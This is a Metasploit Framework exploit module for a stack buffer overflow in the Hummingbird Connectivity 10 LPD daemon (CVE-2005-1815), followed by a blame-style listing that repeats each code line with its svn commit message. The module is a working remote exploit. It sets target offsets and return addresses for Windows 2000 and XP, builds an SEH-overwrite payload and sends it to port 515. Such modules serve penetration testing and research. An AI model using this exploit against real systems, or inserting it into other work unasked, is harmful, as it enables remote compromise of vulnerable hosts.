metasploit-framework/modules/exploits/windows/lpd/hummingbird_exceed.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Hummingbird Connectivity 10 SP5 LPD Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Hummingbird Connectivity
				10 LPD Daemon. This module has only been tested against Hummingbird
				Exceed v10 with SP5.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2005-1815'],
					['OSVDB', '16957'],
					['BID', '13788'],
				],
			'Privileged'     => true,

			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 English SP0-SP4', { 'Offset' => 1620, 'Ret' => 0x75022ac4 }],
					['Windows XP English SP0/SP1',   { 'Offset' => 1596, 'Ret' => 0x71aa2461 }],
				],

			'DisclosureDate' => 'May 27 2005'))

		register_options( [ Opt::RPORT(515) ], self.class )
	end

	def exploit
		connect

		filler = rand_text_english(target['Offset'], payload_badchars)
		seh    = generate_seh_payload(target.ret)
		sploit = filler + seh

		print_status("Trying target #{target.name}...")
		sock.put(sploit)

		handler
		disconnect
	end

end
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`
updated modules to use base class rand_xxx methods git-svn-id: file:///home/svn/framework3/trunk@4498 4d416f70-5f16-0410-b530-b9f4589650da 2007-03-01 08:21:36 +00:00			`# $Id$`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`

			`##`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`# This file is part of the Metasploit Framework and may be subject to`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
replacing defunct framework URL in header comments in most modules and pcap_log git-svn-id: file:///home/svn/framework3/trunk@6479 4d416f70-5f16-0410-b530-b9f4589650da 2009-04-13 14:33:26 +00:00			`# http://metasploit.com/framework/`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`

More modules from MC git-svn-id: file:///home/svn/framework3/trunk@3870 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-12 05:58:09 +00:00			`require 'msf/core'`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! git-svn-id: file:///home/svn/framework3/trunk@7724 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-06 05:50:37 +00:00			`Rank = AverageRanking`
More modules from MC git-svn-id: file:///home/svn/framework3/trunk@3870 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-12 05:58:09 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::Remote::Seh`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
More modules from MC git-svn-id: file:///home/svn/framework3/trunk@3870 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-12 05:58:09 +00:00			`def initialize(info = {})`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`super(update_info(info,`
More modules from MC git-svn-id: file:///home/svn/framework3/trunk@3870 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-12 05:58:09 +00:00			`'Name' => 'Hummingbird Connectivity 10 SP5 LPD Buffer Overflow',`
			`'Description' => %q{`
stop perpetuating the ambiguity! git-svn-id: file:///home/svn/framework3/trunk@9262 4d416f70-5f16-0410-b530-b9f4589650da 2010-05-09 17:45:00 +00:00			`This module exploits a stack buffer overflow in Hummingbird Connectivity`
More modules from MC git-svn-id: file:///home/svn/framework3/trunk@3870 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-12 05:58:09 +00:00			`10 LPD Daemon. This module has only been tested against Hummingbird`
			`Exceed v10 with SP5.`
			`},`
			`'Author' => [ 'MC' ],`
			`'License' => MSF_LICENSE,`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`'Version' => '$Revision$',`
More modules from MC git-svn-id: file:///home/svn/framework3/trunk@3870 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-12 05:58:09 +00:00			`'References' =>`
			`[`
Massive OSVDB reference update from Steve Tornio. git-svn-id: file:///home/svn/framework3/trunk@6629 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-07 20:20:42 +00:00			`['CVE', '2005-1815'],`
tons of indentation fixes, some other style tweaks git-svn-id: file:///home/svn/framework3/trunk@10394 4d416f70-5f16-0410-b530-b9f4589650da 2010-09-20 08:06:27 +00:00			`['OSVDB', '16957'],`
More modules from MC git-svn-id: file:///home/svn/framework3/trunk@3870 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-12 05:58:09 +00:00			`['BID', '13788'],`
			`],`
			`'Privileged' => true,`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
More modules from MC git-svn-id: file:///home/svn/framework3/trunk@3870 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-12 05:58:09 +00:00			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 500,`
			`'BadChars' => "\x00\x0a",`
			`'StackAdjustment' => -3500,`
			`},`
			`'Platform' => 'win',`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`'Targets' =>`
More modules from MC git-svn-id: file:///home/svn/framework3/trunk@3870 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-12 05:58:09 +00:00			`[`
			`['Windows 2000 English SP0-SP4', { 'Offset' => 1620, 'Ret' => 0x75022ac4 }],`
			`['Windows XP English SP0/SP1', { 'Offset' => 1596, 'Ret' => 0x71aa2461 }],`
			`],`

			`'DisclosureDate' => 'May 27 2005'))`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
			`register_options( [ Opt::RPORT(515) ], self.class )`
More modules from MC git-svn-id: file:///home/svn/framework3/trunk@3870 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-12 05:58:09 +00:00			`end`

			`def exploit`
			`connect`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
updated modules to use base class rand_xxx methods git-svn-id: file:///home/svn/framework3/trunk@4498 4d416f70-5f16-0410-b530-b9f4589650da 2007-03-01 08:21:36 +00:00			`filler = rand_text_english(target['Offset'], payload_badchars)`
More modules from MC git-svn-id: file:///home/svn/framework3/trunk@3870 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-12 05:58:09 +00:00			`seh = generate_seh_payload(target.ret)`
			`sploit = filler + seh`

			`print_status("Trying target #{target.name}...")`
			`sock.put(sploit)`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
More modules from MC git-svn-id: file:///home/svn/framework3/trunk@3870 4d416f70-5f16-0410-b530-b9f4589650da 2006-09-12 05:58:09 +00:00			`handler`
			`disconnect`
			`end`

Massive OSVDB reference update from Steve Tornio. git-svn-id: file:///home/svn/framework3/trunk@6629 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-07 20:20:42 +00:00			`end`